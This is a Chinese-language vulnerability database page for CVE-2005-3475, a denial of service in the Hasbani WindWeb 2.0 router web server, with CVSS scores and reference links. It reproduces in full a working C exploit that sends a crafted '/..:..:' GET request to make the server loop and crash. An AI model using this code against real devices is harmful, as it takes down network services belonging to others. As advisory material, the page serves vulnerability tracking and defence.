CVE-2005-3475
CVSS5.0
发布时间 :2005-11-02 21:02:00
修订时间 :2008-09-05 16:54:29
NMCOE    

[原文]Hasbani Web Server (WindWeb) 2.0 allows remote attackers to cause a denial of service (infinite loop) via HTTP crafted GET requests.


[CNNVD]Hasbani Web Server形态异常的HTTP GET请求远程拒绝服务漏洞(CNNVD-200511-100)

        Hasbani Web Server是一款WEB服务程序。
        Hasbani Web Server (WindWeb) 2.0可让远程攻击者通过HTTP制作的GET请求使系统拒绝服务(无限循环)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3475
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3475
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-100
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/24657
(UNKNOWN)  XF  hasbani-get-dos(24657)
http://www.x0n3-h4ck.org/index.php?name=news&article=92
(UNKNOWN)  MISC  http://www.x0n3-h4ck.org/index.php?name=news&article=92
http://www.securityfocus.com/bid/15225
(UNKNOWN)  BID  15225
http://www.osvdb.org/20447
(UNKNOWN)  OSVDB  20447
http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0572.html
(UNKNOWN)  FULLDISC  20051027 Hasbani-WindWeb/2.0 Remote DoS [ with exploit ]

- 漏洞信息

Hasbani Web Server形态异常的HTTP GET请求远程拒绝服务漏洞
中危 其他
2005-11-02 00:00:00 2006-09-05 00:00:00
远程  
        Hasbani Web Server是一款WEB服务程序。
        Hasbani Web Server (WindWeb) 2.0可让远程攻击者通过HTTP制作的GET请求使系统拒绝服务(无限循环)。

- 公告与补丁

        暂无数据

- 漏洞信息 (1274)

Hasbani-WindWeb/2.0 - HTTP GET Remote DoS (EDBID:1274)
hardware dos
2005-10-27 Verified
0 Expanders
N/A [点击下载]
/*
       _______         ________           .__        _____          __
___  __\   _  \   ____ \_____  \          |  |__    /  |  |   ____ |  | __
\  \/  /  /_\  \ /    \  _(__  <   ______ |  |  \  /   |  |__/ ___\|  |/ /
 >    <\  \_/   \   |  \/       \ /_____/ |   Y  \/    ^   /\  \___|    <
/__/\_ \\_____  /___|  /______  /         |___|  /\____   |  \___  >__|_ \
      \/      \/     \/       \/   26\09\05    \/      |__|      \/     \/

[i] Title:              Hasbani-WindWeb/2.0 - HTTP GET  Remote DoS
[i] Discovered by:      Expanders
[i] Exploit by:         Expanders

[ What is Hasbani-WindWeb/2.0 ]

Hasbani server is a httpd created for menaging ethernet routers and adsl modems.

[ Why HTTPD crash? ]

Causes of DoS are not perfecly known by me 'cos i can't debug a chip-integrated http daemon.
Btw seems that Hasbani enter a loop in a GET /..:..:..etc. condition, causes that when an attacker reguest a long crafted string
server enter an endless loop with conseguenly crash of the httpd.

NOTE: This exploit DON'T drop down victim's adsl connection!

[ Timeline ]

This vulnerability was not comunicated because i did'n find Hasbani's vendor.

[ Links ]

www.x0n3-h4ck.org



*/

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>

#define BUGSTR "GET %s HTTP/1.0\n\n\n" // Command where bug reside


char evilrequest[] = {
0x2f, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x78, 0x30, 0x6e, 0x33, 
0x2d, 0x68, 0x34, 0x63, 0x6b, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 
0x2e, 0x3a, 0x2e, 0x2e };

fd_set readfds;
int banner();
int usage(char *filename);
int remote_connect( char* ip, unsigned short port );

int banner() {
  printf("\n       _______         ________           .__        _____          __     \n");
  printf("___  __\\   _  \\   ____ \\_____  \\          |  |__    /  |  |   ____ |  | __ \n");
  printf("\\  \\/  /  /_\\  \\ /    \\  _(__  <   ______ |  |  \\  /   |  |__/ ___\\|  |/ / \n");
  printf(" >    <\\  \\_/   \\   |  \\/       \\ /_____/ |   Y  \\/    ^   /\\  \\___|    <  \n");
  printf("/__/\\_ \\\\_____  /___|  /______  /         |___|  /\\____   |  \\___  >__|_ \\ \n");
  printf("      \\/      \\/     \\/       \\/               \\/      |__|      \\/     \\/ \n\n");
  printf("[i] Title:              \tHasbani-WindWeb/2.0 - HTTP GET  Remote DoS\n");
  printf("[i] Discovered by:      \tExpanders\n");
  printf("[i] Proof of concept by:\tExpanders\n\n");
  return 0;
}

int usage(char *filename) {
  printf("Usage: \t%s HOST <port>   ::   default HTTPD port: 80\n\n",filename);
  exit(0);
}

int remote_connect( char* ip, unsigned short port )
{
  int s;
  struct sockaddr_in remote_addr;
  struct hostent* host_addr;

  memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
  if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
  {
   printf ( "[X] Cannot resolve \"%s\"\n", ip );
   exit ( 1 );
  }
  remote_addr.sin_family = AF_INET;
  remote_addr.sin_port = htons ( port );
  remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
  if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
  {
   printf ( "[X] Socket failed!\n" );
   exit(1);
  }
  if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
  {
   printf ( "[X] Failed connecting!\n" );
          exit(1);
  }
  return ( s );
}


int main(int argc, char *argv[]) {
    int s,n;
    unsigned int rcv;
    char *request;
    char recvbuf[256];
    banner();
    if( argc < 3)
        argv[2] = "80";
    else if ((atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534))
         usage(argv[0]);
    if( (argc < 2) )
        usage(argv[0]);
    request = (char *) malloc(1024);
    printf("[+] Connecting to remote host\n");
    s = remote_connect(argv[1],atoi(argv[2]));
    sleep(1);
    printf("[+] Creating buffer\n");
    sprintf(request,BUGSTR,evilrequest);
    printf("[+] Sending %d bytes of painfull buffer\n",strlen(evilrequest));
    if ( send ( s, request, strlen (request), 0) <= 0 )
    {
            printf("[X] Failed to send buffer\n");
            close(s);
            exit(1);
    }
    sleep(1);
    printf("[+] Done, Packet Sent\n");
    close(s);
    free(request);
    request = NULL;
    return 0;
}		

- 漏洞信息

20447
Hasbani WindWeb Integrated Web Server Malformed GET Request DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability Solution Unknown
Exploit Public

- 漏洞描述

WindWeb Web Server contains a flaw that may allow a remote denial of service. The issue is triggered when requesting a specially crafted URL with many directory traversal characters, and will result in loss of availability for the service.

- 时间线

2005-10-27 Unknow
2005-10-27 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站